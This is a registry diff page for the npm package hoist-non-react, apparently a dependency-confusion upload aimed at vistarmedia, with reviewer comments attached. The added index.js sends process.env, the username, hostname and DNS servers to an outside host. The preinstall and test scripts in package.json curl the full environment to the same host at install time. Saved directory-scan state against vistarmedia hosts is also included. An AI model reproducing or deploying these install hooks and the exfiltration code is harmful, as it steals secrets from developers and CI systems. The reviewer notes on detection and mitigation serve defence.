hoist-non-react 0.0.1-security.0 → 1.0.3


Potentially problematic release.



@@ -0,0 +1 @@
1
+ {"scans":[{"id":"4c685c1a4f8e440d98c3079d2d8076b5","url":"https://docsite.vistarmedia.com/","normalized_url":"https://docsite.vistarmedia.com/","scan_type":"Directory","status":"Running","num_requests":373692,"requests_made_so_far":203418}],"config":{"type":"configuration","wordlist":"/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt","config":"","proxy":"","replay_proxy":"","server_certs":[],"client_cert":"","client_key":"","target_url":"https://docsite.vistarmedia.com/","status_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"replay_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"filter_status":[],"threads":5,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 
Safari/537.36","random_agent":false,"redirects":false,"insecure":true,"extensions":["html","js","xml","json","txt"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"backup_extensions":["~",".bak",".bak2",".old",".1"],"collect_words":false,"force_recursion":false,"scan_dir_listings":false,"protocol":"https","limit_bars":0},"responses":[],"statistics":{"type":"statistics","timeouts":0,"requests":203458,"expected_per_scan":373692,"total_expected":373692,"errors":0,"successes":2,"redirects":203456,"client_errors":0,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":2,"status_301s":0,"status_302s":203456,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":203418,"responses_filtered":203418,"resources_discovered":0,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0],"targets":["https://docsite.vistarmedia.com/"]},"collected_extensions":[],"filters":[{"content_length":142,"line_count":7,"word_count":9,"method":"GET","status_code":302,"dont_filter":false},{"hash":4619493654895045876,"original_url":"https://docsite.vistarmedia.com/1a5645a409d54259b84c1a9a2b1d0ce4"}]}
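Review bot: This added file and the two added files after it are not package code: each looks like saved state from a web content-discovery scanner, naming `docsite.vistarmedia.com` and `job-svc-b.vistarmedia.com` as targets, with `"insecure":true` and a fixed Chrome 90 `user_agent`. Their presence in the published tarball suggests the publisher was probing those hosts from the same working directory, though that is inferred and the file names are not shown on the page. The third file records response `date` headers of Mon, 03 Mar 2025 20:57 GMT. Together with the user agent and the request counts in `statistics`, that gives the site owner concrete values to match against web server and WAF logs.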
@@ -0,0 +1 @@
1
+ {"scans":[{"id":"fd74194078154aff983903f878ecfeec","url":"https://docsite.vistarmedia.com/","normalized_url":"https://docsite.vistarmedia.com/","scan_type":"Directory","status":"Running","num_requests":373692,"requests_made_so_far":0}],"config":{"type":"configuration","wordlist":"/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt","config":"","proxy":"","replay_proxy":"","server_certs":[],"client_cert":"","client_key":"","target_url":"https://docsite.vistarmedia.com//","status_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"replay_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"filter_status":[],"threads":5,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 
Safari/537.36","random_agent":false,"redirects":false,"insecure":true,"extensions":["html","js","xml","json","txt"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"backup_extensions":["~",".bak",".bak2",".old",".1"],"collect_words":false,"force_recursion":false,"scan_dir_listings":false,"protocol":"https","limit_bars":0},"responses":[],"statistics":{"type":"statistics","timeouts":0,"requests":22,"expected_per_scan":373692,"total_expected":373692,"errors":0,"successes":2,"redirects":20,"client_errors":0,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":2,"status_301s":0,"status_302s":20,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":0,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0],"targets":["https://docsite.vistarmedia.com//"]},"collected_extensions":[],"filters":[{"content_length":142,"line_count":7,"word_count":9,"method":"GET","status_code":302,"dont_filter":false},{"hash":4619493654895045876,"original_url":"https://docsite.vistarmedia.com//ce8fc7c915354b86be95adec5cb82410"}]}
@@ -0,0 +1 @@
1
+ {"scans":[{"id":"42b145f197304ce6b8f0ee92d99ee66c","url":"https://job-svc-b.vistarmedia.com/","normalized_url":"https://job-svc-b.vistarmedia.com/","scan_type":"Directory","status":"Running","num_requests":373692,"requests_made_so_far":61776}],"config":{"type":"configuration","wordlist":"/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt","config":"","proxy":"","replay_proxy":"","server_certs":[],"client_cert":"","client_key":"","target_url":"https://job-svc-b.vistarmedia.com/","status_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"replay_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"filter_status":[],"threads":5,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 
Safari/537.36","random_agent":false,"redirects":false,"insecure":true,"extensions":["html","js","xml","json","txt"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"backup_extensions":["~",".bak",".bak2",".old",".1"],"collect_words":false,"force_recursion":false,"scan_dir_listings":false,"protocol":"https","limit_bars":0},"responses":[{"type":"response","url":"https://job-svc-b.vistarmedia.com/robots.txt","original_url":"https://job-svc-b.vistarmedia.com/","path":"/robots.txt","wildcard":false,"status":200,"method":"GET","content_length":25,"line_count":2,"word_count":4,"headers":{"date":"Mon, 03 Mar 2025 20:57:17 GMT","content-type":"text/plain; charset=utf-8","content-length":"25"},"extension":"","timestamp":1741035437.3414016},{"type":"response","url":"https://job-svc-b.vistarmedia.com/ping","original_url":"https://job-svc-b.vistarmedia.com/","path":"/ping","wildcard":false,"status":200,"method":"GET","content_length":2,"line_count":1,"word_count":1,"headers":{"content-length":"2","content-type":"text/plain; charset=utf-8","date":"Mon, 03 Mar 2025 20:57:46 
GMT"},"extension":"","timestamp":1741035466.5188165}],"statistics":{"type":"statistics","timeouts":0,"requests":61827,"expected_per_scan":373692,"total_expected":373692,"errors":0,"successes":4,"redirects":0,"client_errors":61823,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":4,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":61823,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":61785,"responses_filtered":61785,"resources_discovered":2,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0],"targets":["https://job-svc-b.vistarmedia.com/"]},"collected_extensions":[],"filters":[{"content_length":null,"line_count":118,"word_count":242,"method":"GET","status_code":403,"dont_filter":false},{"hash":15321784697444581396,"original_url":"https://job-svc-b.vistarmedia.com/5b5ed641bb6a4a52b2b6289593c479c8"},{"hash":15321784697444614164,"original_url":"https://job-svc-b.vistarmedia.com/7e880a0126f844b5aa8a9ad183909444.html"},{"hash":15321784697444614228,"original_url":"https://job-svc-b.vistarmedia.com/64a09bef74f74e4a8a23f29534464393.js"},{"hash":15321784697444614356,"original_url":"https://job-svc-b.vistarmedia.com/e05254da06c740c69f99cd17397f5958.xml"},{"hash":15321784714624450580,"original_url":"https://job-svc-b.vistarmedia.com/68e649d8ea994f5a8321717870efacf7.txt"}]}
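--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,45 @@
+//index.js
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+en: process.env,
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "hoist-non-react.oob.jr0ch17.com",
+port: 80,
+path: "/?NPM",
+method: "GET",
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on("error", (e) => {
+// console.error(e);
+});
+
+req.write(postData);
+req.end();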
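Review bot: On load this module serialises the whole of `process.env` (`en: process.env`) together with the home directory, hostname, username, DNS servers and the full `package.json`, and sends it to `hoist-non-react.oob.jr0ch17.com`; the file exports nothing, so collection is its only visible behaviour. Any environment in which the package was required should be treated as having exposed its environment-held secrets (tokens, cloud keys, CI variables), and those should be rotated. The request is built with the `https` module but `port: 80`, and the `error` handler body is only a commented-out `console.error`, so a failed or partial send leaves nothing in the process output. Detection should therefore rely on DNS and egress logs for that hostname rather than on application logs.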
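--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,12 @@
 {
 "name": "hoist-non-react",
-"version": "0.0.1-security.0",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"version": "1.0.3",
+"description": "vistarmedia hoist-non-react",
+"main": "index.js",
+"scripts": {
+"test": "echo \"No tests\" && curl -X POST http://hoist-non-react.oob.jr0ch17.com/?host=$(hostname) -d \"$(env)\"",
+"preinstall": "echo \"No tests\" && curl -X POST http://hoist-non-react.oob.jr0ch17.com/?host=$(hostname) -d \"$(env)\""
+},
+"author": "@JR0ch17",
+"license": "ISC"
 }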
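Review bot: The `preinstall` script posts `$(env)` and `$(hostname)` to `http://hoist-non-react.oob.jr0ch17.com/` with curl, so the full environment leaves the machine in cleartext at install time, before `index.js` is ever required; the `test` script repeats the same command. The version moves from the registry's `0.0.1-security.0` holding package to `1.0.3` with an organisation name in `description`, which is consistent with a dependency-confusion publication (inferred, not stated on the page). Installing with `--ignore-scripts`, or setting `ignore-scripts=true` in `.npmrc`, keeps lifecycle hooks like this from running. Keeping internal package names under a private scope bound to a private registry removes the name collision itself.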
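--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=hoist-non-react for more information.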